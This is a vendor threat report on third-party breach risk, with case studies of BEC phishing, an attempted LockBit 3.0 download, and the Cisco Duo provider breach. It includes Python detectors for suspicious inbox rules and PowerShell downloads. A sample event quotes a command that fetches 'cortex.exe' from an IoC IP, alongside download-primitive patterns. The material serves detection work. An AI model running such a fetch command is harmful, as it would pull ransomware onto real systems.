July 25, 2024
Key Points
Most organizations work with countless third-party vendors and suppliers in relationships that are not only necessary but also fruitful, contributing to increased revenue, customer retention, and access to outside resources and expertise. In the digital age, the number of these collaborations has surged, offering financial benefit but also presenting significant security challenges. This report will outline the definition and scope of third-party risk, analyze various real-world examples, and provide strategic insights into managing these risks effectively. Additionally, it will detail ReliaQuest’s robust detection and response strategies aimed at protecting organizations from the threat of third-party compromise.
Third-party risk refers to the potential for your organization to be negatively affected if a vendor or supplier is impacted by a cyber incident. The scope of third-party risk is vast, encompassing all the possible impacts of security breaches affecting vendors or suppliers, regardless of scale. Depending on the nature of the third-party breach, the consequences for customer organizations can be diverse, as indicated by the following non-exhaustive examples.
Whether or not a third-party breach leads to a direct attack on a customer organization, other repercussions—ranging from exposed data and service downtime to supply chain disruptions—can still inflict significant damage. It is estimated that 98% of organizations are affiliated with at least one third party that has suffered a breach, meaning that almost every company is at immediate risk of the direct or indirect consequences of a third-party breach. Multiple threat actors, including “LockBit” and “Clop,” use third-party compromise as an attack vector to reach other organizations, and the efficacy of large-scale ransomware campaigns such as Clop’s “MOVEit” campaign was partly determined by the impact they had through the third-party vector. The prevalence of third-party breaches is expected to remain high throughout 2024, with certain kinds of breach showing particular popularity. For example, ReliaQuest observed a marked increase in business email compromise (BEC) attacks through 2023, driven by advances in technique and the attacks’ potential lucrativeness, a trend that is set to continue throughout 2024.
The sheer volume of companies associated with third parties that have been compromised shows that third-party risk is a global problem that can affect organizations in all industries. However, the risk is particularly pronounced in the healthcare and social assistance and financial services sectors, which tend to be more dependent on third-party service providers. In the healthcare sector, for example, reliance on external providers for core functionalities such as data storage means the consequences of third-party breaches can be particularly severe, often leading to the release or threatened release of highly sensitive patient data. Recognizing the seriousness with which organizations view third-party compromises, threat actors sometimes allege breaches on major third-party providers to exert pressure on them. For instance, in an incident that began in May 2024, the threat actor “ShinyHunters” claimed to have breached the cloud-services provider Snowflake, demanding a $20 million ransom for leaked data from two of their customers. Although Snowflake maintains that these breaches were not third-party and resulted from customer use of single-factor rather than multifactor authentication, the allegations nevertheless caused substantial concern among their customers and sparked ongoing speculation about the validity of the threat actors’ claims.
In this section, we examine three case studies highlighting some of the various attack vectors and impacts that characterize third-party breaches. The first two case studies show how third-party breaches posed direct risks to customer environments, while the third extends the focus to the downstream effects of attacks on infrastructure managed by a fourth party.
In October 2023, ReliaQuest uncovered a security incident in which a customer was targeted with over 1,000 phishing emails originating from a compromised third-party business email account. The attack was linked to the “Storm-1167” threat actor, which used a phishing link to lead victims to a fraudulent Microsoft sign-in page and capture their session tokens. These tokens allowed the attacker to access the customer’s internal email and cloud services.
A compromised internal account was subsequently used to send an additional 1,300 emails with a credential harvester, suggesting an attempt to target higher-privilege accounts and widen the attack’s scope. To delay detection, the threat actor created email rules to auto-forward emails containing specific keywords to a designated folder. ReliaQuest escalated the incident, advising the customer to rotate account credentials, block the sender and domain, and clear the phishing emails from recipients’ inboxes.
This incident highlights how business email compromise can result in multi-level breaches: the initial compromise of the third party became the basis for a further phishing campaign against the customer, with the emails sent from the third party’s own domain. The potential for compromised email addresses to be turned against other entities in a continuing attack chain shows that third-party breaches such as these can have far-reaching consequences. Although preventing sophisticated BEC attempts like this is difficult, it is essential to ensure that strong email authentication measures are in place to offer the best possible defense. This includes monitoring and blocking emails even from trusted domains if they resemble those used in BEC attempts. For emails that do manage to bypass detections, ReliaQuest’s GreyMatter Phishing Analyzer is a useful tool for automatically evaluating and removing emails reported as suspicious and initiating response actions.
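The auto-forwarding inbox rules described in this case study are one of the few durable artifacts a BEC actor leaves behind. The following heuristic, added here as an illustration and not part of the original report or of GreyMatter, scores New-InboxRule audit records for keyword-based rules that move or hide mail; the folder and keyword watch-lists, the constructed sample records and the account names are assumptions, and the record shape follows the Exchange Online audit-log convention of a Parameters list of Name/Value pairs.

```python
import json
from typing import Dict, Iterable, List, Optional

# Assumed heuristic lists: folders used to hide auto-filed mail, and rule keywords that
# often mark an attempt to hide payment, credential or security-alert traffic.
HIDING_FOLDERS = {"rss subscriptions", "rss feeds", "conversation history", "junk email", "deleted items"}
SUSPICIOUS_KEYWORDS = {"invoice", "payment", "wire", "password", "mfa", "phishing", "suspicious", "helpdesk"}
WORD_CONDITIONS = ("SubjectContainsWords", "BodyContainsWords", "SubjectOrBodyContainsWords")

def parse_new_inbox_rule(record: Dict) -> Optional[Dict]:
    """Normalise one New-InboxRule audit record (Parameters as Name/Value pairs) into a rule dict."""
    if record.get("Operation") != "New-InboxRule":
        return None
    params = {p["Name"]: p["Value"] for p in record.get("Parameters", [])}
    keywords = []
    for key in WORD_CONDITIONS:  # word lists arrive as one semicolon-separated string
        keywords += [w.strip().lower() for w in params.get(key, "").split(";") if w.strip()]
    return {"user": record.get("UserId", ""), "name": params.get("Name", ""), "keywords": keywords,
            "folder": params.get("MoveToFolder", ""),
            "delete": params.get("DeleteMessage", "False") == "True",
            "mark_read": params.get("MarkAsRead", "False") == "True"}

def score_rule(rule: Dict) -> List[str]:
    """Return the reasons a rule looks like attacker-created mail hiding; an empty list means benign."""
    checks = [
        (set(rule["keywords"]) & SUSPICIOUS_KEYWORDS, "keyword condition matches BEC watch-list"),
        (rule["folder"].lower() in HIDING_FOLDERS, f"moves matching mail to '{rule['folder']}'"),
        (rule["delete"], "deletes matching mail"),
        (rule["mark_read"], "marks matching mail as read"),
        (len(rule["name"].strip()) <= 2, "near-empty rule name"),
    ]
    return [reason for hit, reason in checks if hit]

def find_suspicious_rules(lines: Iterable[str]) -> List[Dict]:
    """Run the heuristics over newline-delimited JSON audit records and return the hits."""
    hits = []
    for line in lines:
        rule = parse_new_inbox_rule(json.loads(line))
        if rule and (reasons := score_rule(rule)):
            hits.append({**rule, "reasons": reasons})
    return hits

# Constructed sample records in the Exchange Online audit-log shape (not real customer data).
SAMPLE_LOG = [
    json.dumps({"Operation": "New-InboxRule", "UserId": "finance.user@corp.example.com", "Parameters": [
        {"Name": "Name", "Value": "."}, {"Name": "MoveToFolder", "Value": "RSS Subscriptions"},
        {"Name": "SubjectOrBodyContainsWords", "Value": "invoice;password;suspicious"},
        {"Name": "MarkAsRead", "Value": "True"}]}),
    json.dumps({"Operation": "New-InboxRule", "UserId": "jdoe@corp.example.com", "Parameters": [
        {"Name": "Name", "Value": "Newsletters"}, {"Name": "MoveToFolder", "Value": "Newsletters"},
        {"Name": "FromAddressContainsWords", "Value": "news@example.org"}]}),
]
```

Running `find_suspicious_rules(SAMPLE_LOG)` flags only the first record, which trips four heuristics at once; a single hit such as a junk-folder rule alone is worth reviewing but rarely conclusive on its own.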
In October 2023, ReliaQuest detected a user from a customer in the healthcare and social assistance sector attempting an unusual process via a PowerShell command. Our analysis revealed that the account executing the PowerShell command was a compromised third-party administrator account.
After compromising the third-party account, the threat actor attempted to download the executable file “cortex.exe” in the customer environment from the IP address 185.212.128[.]41. An endpoint detection and response (EDR) tool blocked this download; however, our analysis indicated that the cortex.exe file was a “LockBit 3.0” executable, related to the LockBit ransomware group. It is highly likely the customer had been targeted by a LockBit ransomware attack via the third party.
After the download was blocked, ReliaQuest took further steps to ensure that the customer environment remained secure. We recommended that the customer isolate the host and terminate any ongoing sessions linked to the compromised account. After mitigating the immediate threat, ReliaQuest advised rotating the user’s credentials and reimaging the affected host. We then blocked all indicators of compromise (IoCs). This ensured that LockBit would no longer be able to use the compromised account to carry out further malicious activities toward the customer, and that if they had discovered any customer credentials during the initial compromise, these would be unusable.
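The detection in this case study hinged on an unusual PowerShell command run by a third-party administrator account. The following triage logic, added here as an illustration and not code from the original report or from GreyMatter, scores PowerShell script-block events for executables fetched from a bare IP address, matches the destination against the IoC quoted above, and escalates when the account belongs to a vendor; the event shape, the vendor domain suffix, the host names and the sample events are all constructed assumptions.

```python
import re
from typing import Dict, List

# IoC quoted in the case above; the page defangs it as 185.212.128[.]41.
KNOWN_BAD_HOSTS = {"185.212.128.41"}
# Assumed naming convention: vendor-owned accounts use a dedicated domain suffix.
THIRD_PARTY_DOMAIN = "@vendor.example.net"

# Cmdlets, aliases and .NET calls commonly used to fetch files from PowerShell.
DOWNLOAD_PRIMITIVE = re.compile(
    r"(Invoke-WebRequest|\biwr\b|\bwget\b|\bcurl\b|DownloadFile|DownloadString|"
    r"Invoke-RestMethod|\birm\b|Start-BitsTransfer)", re.IGNORECASE)
# A URL whose host is a bare IPv4 address and whose path ends in an executable extension.
BARE_IP_EXECUTABLE = re.compile(
    r"https?://(\d{1,3}(?:\.\d{1,3}){3})(?::\d+)?/[^\s'\"]*?\.(?:exe|dll|ps1|bat|scr|msi)\b",
    re.IGNORECASE)

def analyze_script_block(event: Dict[str, str]) -> Dict[str, object]:
    """Score one script-block event (constructed shape: user, host, script) and list the reasons."""
    script, user = event.get("script", ""), event.get("user", "").lower()
    reasons: List[str] = []
    url = BARE_IP_EXECUTABLE.search(script)
    if url and DOWNLOAD_PRIMITIVE.search(script):
        reasons.append(f"executable fetched from bare IP {url.group(1)}")
        if url.group(1) in KNOWN_BAD_HOSTS:
            reasons.append("destination matches known LockBit 3.0 IoC")
        if user.endswith(THIRD_PARTY_DOMAIN):
            reasons.append("run by a third-party account; isolate host and end its sessions")
    severity = "none" if not reasons else ("high" if len(reasons) > 1 else "medium")
    return {"host": event.get("host", ""), "user": user, "severity": severity, "reasons": reasons}

def triage(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Return only the events that produced at least one finding."""
    return [f for f in map(analyze_script_block, events) if f["severity"] != "none"]

# Constructed sample events modelled on the case above (not real telemetry).
SAMPLE_EVENTS = [
    {"user": "svc-admin@vendor.example.net", "host": "WS-0142",
     "script": "Invoke-WebRequest -Uri http://185.212.128.41/cortex.exe -OutFile C:\\Users\\Public\\cortex.exe"},
    {"user": "jdoe@corp.example.com", "host": "WS-0201",
     "script": "Get-ChildItem C:\\Temp | Where-Object { $_.Length -gt 1MB }"},
    {"user": "jdoe@corp.example.com", "host": "WS-0201",
     "script": "Invoke-WebRequest -Uri https://updates.example.com/tool.msi -OutFile tool.msi"},
]
```

Only the first sample event produces a finding, rated high because the download, the IoC match and the third-party account all coincide; the vendor-signed update in the third event is left alone because its host is a name, not a bare IP.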
How the third party was compromised in this case is not known; however, targeting third-party providers has become a common strategy for ransomware groups such as LockBit and Clop. To reduce the possibility of threat groups using this attack vector, it is essential for organizations to carefully vet vendors and suppliers. To make it as difficult as possible for threat actors to use third-party administrator accounts, it is important to ensure that all accounts use multifactor authentication and that all credentials are unique for each organization the third party interacts with. Additionally, make sure that the principle of least privilege is adhered to: if third parties have access to your environment, they should only have access to the parts of your environment necessary to complete the tasks they are responsible for.
On April 1, 2024, the MFA service provider Cisco Duo informed customers that an unnamed provider that handled the company’s SMS and voice over IP (VoIP) MFA messages had been compromised in a phishing incident. The threat actor who targeted the provider downloaded SMS and VoIP message logs associated with specific Duo accounts. The data in the logs contained the phone number, carrier, location data, date, time, and message type for employees of customer organizations. At the time of writing, it is not known whether threat actors have breached Cisco Duo customer environments using this stolen data.
The Cisco Duo vendor breach underscores the efforts by threat actors to target critical components of corporate security architecture. By focusing on third- and sometimes fourth-party providers, threat actors can exploit the dependencies that corporations have on their service providers, critical for functions like MFA. In this case, the threat actor used phishing to obtain credentials from an employee at a provider for Cisco Duo, highlighting how far outside the control of Cisco Duo customers the incident was.
Effective management of third-party risk is essential for maintaining the security and integrity of an organization’s operations. Third-party risk management is inherently challenging because it involves variables outside an organization’s direct control, necessitating a proactive approach to understanding these risks and preparing strategic responses for potential worst-case scenarios. The best practices detailed here can help organizations mitigate risks associated with their third-party relationships.
ReliaQuest uses multiple methods to detect third-party breaches, while also deploying effective detection, containment, and response mechanisms to protect customers if data compromised in a third-party breach is used to target their environment.
Detecting third-party breaches poses a significant challenge, as they often only come to light when they are publicly announced or when compromised data is used in subsequent attempts to breach customer environments. Additional complicating factors exacerbate this issue. For instance, a third party may be reluctant to disclose that it has been compromised in a cyberattack, fearing the potential reputational damage and customer loss that could occur as a result. In addition, there are multiple contexts in which a third party might not be aware of a breach, particularly if they have been targeted by an advanced persistent threat (APT) group specializing in espionage operations. In such instances, the APT would compromise systems but maintain a low profile to avoid detection, quietly gathering sensitive information to be used in attacks against other organizations. In some cases, a subsequent cyber attack might never be linked back to the compromise of a third party. Consider a scenario, for example, where a customer organization is hit by a spearphishing campaign that uses proprietary information obtained from a third-party breach. If the phishing emails originate from unrelated domains and use this information subtly, without making explicit references, pinpointing the origins of the attack becomes almost impossible.
To enhance awareness of third-party compromises, organizations can use ReliaQuest’s Threat News Tippers and Intelligence Updates, which highlight significant breaches reported in the media, including those related to major third-party service providers. In addition, Ransomware Tippers identify organizations that have been listed on leak sites operated by ransomware groups.
For GreyMatter Digital Risk Protection customers, additional functionalities are available. This service continuously monitors the open, deep, and dark web, including closed and technical sources, for third-party data breaches relevant to customers, including billions of files exposed via misconfigured S3 buckets, File Transfer Protocol (FTP), rsync, and Server Message Block (SMB). In 2023 alone, we discovered over 6 billion exposed credentials in breached data on the clear and dark web, bringing the total number we have found to more than 36 billion. Monitoring the clear and dark web in this way ensures that customers are promptly informed not only when third parties are directly breached, but also when inadequate security practices by third parties allow threat actors to access sensitive data.
ReliaQuest is committed to safeguarding our customers against the wide-ranging threats that could arise from third-party compromises. Our detection rules and response plays help defenders react rapidly when threat actors are attempting breaches using data obtained from third-party compromises.